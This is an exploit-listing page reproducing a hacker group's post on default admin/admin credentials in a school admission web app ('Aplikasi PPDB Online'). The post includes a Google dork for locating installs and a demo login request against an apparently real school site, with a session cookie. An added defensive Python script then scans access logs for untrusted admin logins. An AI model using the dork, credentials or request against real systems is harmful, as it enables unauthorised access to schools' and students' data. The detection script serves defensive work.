Aplikasi PPDB Online - Default Admin Login Credentials

CVE: N/A
Category: CWE-287: Improper Authentication
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2021-01-30
CPE: cpe:/a:aplikasi:ppdb_online:1.0.0
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010201

Below is a copy:

#############################################################
# Exploit Title: Aplikasi PPDB Online - Default Admin Login Credentials
# Google Dork: intitle:"Halaman Login" inurl:/panel_admin/log_in
# Date: 2021-1-30
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: gst-dev.net
# Software Version: ppdb_2021
# Software Link: http://gst-dev.net/#services
# Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux

#############################################################
[*] Information:

GST - Dev is a website that provides instant school website creation services. Here, you can create your own website without requiring expertise in web design and programming. All you do is fill in the form provided, choose a design theme, then within 3 days, your school website will go straight online.

#############################################################
[*] Exploit:

{
"username":"admin",
"password":"admin",
"btnlogin":""
}

#############################################################
[*] Demo:
https://pcpdb.sanclar-mc.sch.id/kbk/panel_admin/log_in

POST /kbk/panel_admin/log_in HTTP/1.1
Host: pcpdb.sanclar-mc.sch.id
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://pcpdb.sanclar-mc.sch.id
DNT: 1
Connection: keep-alive
Referer: https://pcpdb.sanclar-mc.sch.id/kbk/panel_admin/log_in
Cookie: ci_session=r2g5bpb7tqpouf3aqs0r1lcs1r06q6i5
Upgrade-Insecure-Requests: 1
{"username":"admin","password":"admin","btnlogin":""}

#############################################################
[*] Contact:

# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_.py
# Twitter: twitter.com/Gh05t666nero1
# E-mail: [email protected]
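
For operators of an affected install, the following is an added detection example, not part of the original advisory or the vendor's code. It scans web access logs for clients outside a trusted list that POST to the `/panel_admin/log_in` form named above and then load another admin page successfully. Assumptions: combined log format, other admin pages share the `/panel_admin/` prefix and return 200 only with a valid session, and the `/ppdb/` prefix, page names and IP addresses in the sample are constructed.

```python
import re
from collections import defaultdict

# Combined log format (assumed): ip - - [ts] "METHOD path proto" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LOGIN = re.compile(r'/panel_admin/log_in/?$')    # login path from the advisory
ADMIN = re.compile(r'/panel_admin/(?!log_in)')   # assumed: other admin pages share the prefix

def admin_logins(lines, trusted_ips=()):
    """Return {ip: [paths]} for untrusted IPs that POSTed to the login form
    and afterwards fetched another admin page with status 200."""
    posted = set()
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                      # skip lines in another format
        ip, _ts, method, path, status = m.groups()
        path = path.split("?", 1)[0]      # ignore any query string
        if ip in trusted_ips:
            continue                      # known administrator addresses
        if method == "POST" and LOGIN.search(path):
            posted.add(ip)
        elif ip in posted and ADMIN.search(path) and status == "200":
            hits[ip].append(path)
    return dict(hits)

def _l(ip, method, path, status):
    # Helper that builds one constructed log line.
    return (f'{ip} - - [30/Jan/2021:10:00:00 +0700] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')

# Constructed sample log (documentation IP ranges, hypothetical page names).
SAMPLE = [
    _l("192.0.2.10", "GET", "/ppdb/panel_admin/log_in", 200),
    _l("192.0.2.10", "POST", "/ppdb/panel_admin/log_in", 302),
    _l("192.0.2.10", "GET", "/ppdb/panel_admin/dashboard", 200),   # reached admin area
    _l("198.51.100.7", "POST", "/ppdb/panel_admin/log_in", 302),
    _l("198.51.100.7", "GET", "/ppdb/panel_admin/log_in", 200),    # bounced back to form
    _l("203.0.113.5", "POST", "/ppdb/panel_admin/log_in", 302),
    _l("203.0.113.5", "GET", "/ppdb/panel_admin/siswa", 200),      # trusted admin
    _l("192.0.2.99", "GET", "/ppdb/panel_admin/dashboard", 302),   # no login POST
]

if __name__ == "__main__":
    for ip, paths in admin_logins(SAMPLE, trusted_ips={"203.0.113.5"}).items():
        print(f"review admin session from {ip}: {paths}")
```

Access logs do not record the submitted password, so a hit only shows that an untrusted address obtained an admin session. The fix is still to change the default `admin` password and restrict who can reach the panel.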
